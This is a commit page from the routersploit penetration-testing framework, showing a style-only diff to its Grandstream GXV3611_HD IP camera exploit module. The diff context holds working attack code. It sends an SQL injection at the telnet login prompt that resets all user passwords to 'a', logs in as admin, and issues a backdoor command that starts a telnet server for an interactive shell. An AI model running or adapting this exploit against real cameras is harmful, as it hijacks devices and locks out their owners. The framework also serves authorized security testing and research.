Skip to content

R
routersploit
Commit 233ef4ce by Joshua Abraham
Options

Fixed PEP8

parent d90572c0
master v3.4.4 v3.4.3 v3.4.2 v3.4.0 v3.3.0 v3.2.0 v3.1.0 v3.0.0
No related merge requests found
Showing with 4 additions and 11 deletions
routersploit/modules/exploits/grandstream/gxv3611hd_ip_camera_rce.py
......@@ -3,17 +3,12 @@ import telnetlib
from routersploit import (
exploits,
mute,
sanitize_url,
print_error,
print_success,
print_status,
print_table,
)
class Exploit(exploits.Exploit):
"""
Simple description
"""
__info__ = {
'name': 'Grandsteam GXV3611_HD - SQL Injection',
'description': 'Module exploits an SQL injection vulnerability in Grandstream GXV3611_HD IP cameras. '
......@@ -41,15 +36,15 @@ class Exploit(exploits.Exploit):
try:
conn = telnetlib.Telnet(self.target, self.port)
conn.read_until("Username: ")
conn.write("';update user set password='a';--\r\n") #This changes all the passwords to 'a'
conn.write("';update user set password='a';--\r\n") # This changes all the passwords to 'a'
conn.read_until("Password: ")
conn.write("nothing\r\n")
conn.read_until("Username: ")
conn.write("admin\r\n")
conn.read_until("Password: ")
conn.write("a\r\n") #Login with the new password
conn.write("a\r\n") # Login with the new password
conn.read_until("> ")
conn.write("!#/ port lol\r\n") #Backdoor command triggers telnet server to startup.
conn.write("!#/ port lol\r\n") # Backdoor command triggers telnet server to startup.
conn.read_until("> ")
conn.write("quit\r\n")
conn.close()
......@@ -68,7 +63,6 @@ class Exploit(exploits.Exploit):
conn.interact()
except:
print_error("Failed to log into backdoor.")
else:
print_error("Exploit failed. Target does not appear vulnerable")
......@@ -80,4 +74,3 @@ class Exploit(exploits.Exploit):
return True
else:
return False
Markdown is supported
0% or
You are about to add 0 people to the discussion. Proceed with caution.
Finish editing this message first!
Please register or to comment